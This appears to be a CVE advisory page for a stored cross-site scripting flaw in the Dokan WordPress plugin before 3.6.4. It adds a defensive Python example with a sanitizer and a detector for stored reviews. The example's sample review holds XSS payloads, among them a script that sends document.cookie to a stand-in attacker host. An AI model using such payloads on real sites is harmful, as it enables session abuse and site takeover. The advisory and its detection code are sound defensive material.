Dokan < 3.6.4 - Vendor Stored Cross-Site Scripting
Description
The Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary JavaScript in product reviews, enabling stored XSS attacks against site administrators.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Dokan WordPress plugin, versions before 3.6.4, fails to properly sanitize product reviews submitted by vendors. Review content containing JavaScript is accepted, stored, and later rendered in a context where the browser executes it, which makes this a stored (persistent) cross-site scripting (XSS) issue: the payload lives in the site's data and fires for every user who views it, not only for whoever clicked a crafted link. The affected code path is triggered when a vendor submits a review via the plugin's frontend or backend interface. [1]
Exploitation
An attacker must have a vendor account on the WordPress site (authenticated with the vendor role). The attacker submits a product review containing malicious JavaScript. When other users, including site administrators, view the product page or the review, the injected script executes in their browser. No additional user interaction beyond viewing the review is required. [1]
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser and, with it, to perform any action the victim can perform on the site. Because WordPress sets its authentication cookies HttpOnly, the realistic route is usually not reading the session cookie but riding the victim's authenticated session: when the victim is an administrator, that means actions such as creating a further administrator account or changing site settings, issued with the victim's own nonces. Defacement and compromise of the entire WordPress site follow from administrative access. The exact impact depends on the privileges of the user who views the review. [1]
Mitigation
The vulnerability is fixed in version 3.6.4 of the Dokan plugin; sites should update to this version or later immediately. No workarounds are documented, so no configuration change closes the issue short of updating. The plugin is actively maintained, and the fix was released on 2022-09-13. The update closes the injection path for new reviews; whether reviews stored before the update are neutralised depends on whether the fix sanitises on output or only on input, which is not stated here, so existing vendor-submitted reviews should be checked for injected markup. [1]
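The Vulnerability and Exploitation sections describe the bug class (review markup stored unsanitised and executed when an administrator views it) and the Mitigation section notes that no workaround exists beyond the update. The script below is an added example written for this page, not Dokan's code: the review body, the wp_comments-shaped rows, the allow-list policy and every function name are assumptions. It contrasts rendering a stored review raw, output-encoding it, and passing it through a wp_kses-style allow-list sanitizer, then reuses the same detector to hunt a table of already-stored reviews for payloads that predate the update.

```python
# Added example for this advisory, not Dokan's code: the review text, the
# wp_comments-shaped rows, the allow-list policy and all names are assumptions.
import html
from html.parser import HTMLParser

# Constructed attacker input: a review body a malicious vendor could submit.
# Three vectors: a script tag, an event-handler attribute, a javascript: URL.
MALICIOUS_REVIEW = (
    'Great product! <script>fetch("https://attacker.example/?c="+document.cookie)</script>'
    '<b onmouseover="alert(1)">hover me</b> '
    '<a href="javascript:alert(document.domain)">details</a>'
)
# Assumed policy, modelled on the allow-list idea behind wp_kses, not its tables.
ALLOWED_TAGS = {"b", "i", "em", "strong", "a", "p", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")

def render_vulnerable(review):
    """The bug class: stored review text is emitted into the page as markup."""
    return f'<div class="review">{review}</div>'

def render_escaped(review):
    """Simplest fix: output-encode, so the review is text and never markup."""
    return f'<div class="review">{html.escape(review, quote=True)}</div>'

class _AllowlistSanitizer(HTMLParser):
    """Rebuilds markup keeping only allow-listed tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside <script>/<style>
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # drop the tag itself, keep its text
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # every on* handler, style, etc. is discarded
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # javascript:, data:, vbscript: ... are discarded
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=True))

def sanitize_review(review):
    p = _AllowlistSanitizer()
    p.feed(review)
    p.close()
    return "".join(p.out)

class _ActiveContentDetector(HTMLParser):
    """Flags script tags, on* handlers and javascript: URLs in parsed markup."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in ("href", "src") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in <{tag} {name}>")

def active_content(markup):
    """Escaped text contains no tags, so it yields no findings; raw payloads do."""
    d = _ActiveContentDetector()
    d.feed(markup)
    d.close()
    return d.findings

# Constructed rows shaped like wp_comments (comment_ID, comment_author,
# comment_type, comment_content). No workaround is documented, so after the
# update the practical follow-up is to hunt for payloads already stored.
STORED_REVIEWS = [
    (101, "honest_vendor", "review", "Solid build, <b>recommended</b>."),
    (102, "evil_vendor", "review", MALICIOUS_REVIEW),
    (103, "customer", "review", 'See <a href="https://example.com/spec">spec</a>'),
    (104, "evil_vendor", "review", '<img src=x onerror="alert(1)">'),
]

def hunt_stored_reviews(rows):
    """(comment_ID, author, findings) for every review that carries active content."""
    return [(cid, author, f) for cid, author, ctype, content in rows
            if ctype == "review" and (f := active_content(content))]

if __name__ == "__main__":
    print("raw:      ", active_content(render_vulnerable(MALICIOUS_REVIEW)))
    print("sanitized:", active_content(render_vulnerable(sanitize_review(MALICIOUS_REVIEW))))
    print("hunt:     ", hunt_stored_reviews(STORED_REVIEWS))
```

Run as-is, the script prints three findings for the raw rendering, none for the sanitized one, and two hits from the constructed table (both by the malicious vendor). The sanitizer keeps the text of dropped tags but discards script bodies entirely, and it re-escapes text it emits, so an entity-encoded payload cannot reappear as markup. Against a real site the equivalent hunt is running active_content over comment_content for the rows that hold product reviews; the comment_type value used for reviews and the column names here are assumptions, not taken from the plugin.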
AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Patches
154cf44d341aa
Vulnerability mechanics
References
[1] wpscan.com/vulnerability/85e32913-dc2a-44c9-addd-7abde618e995/ (mitre; exploit; vdb-entry; technical-description)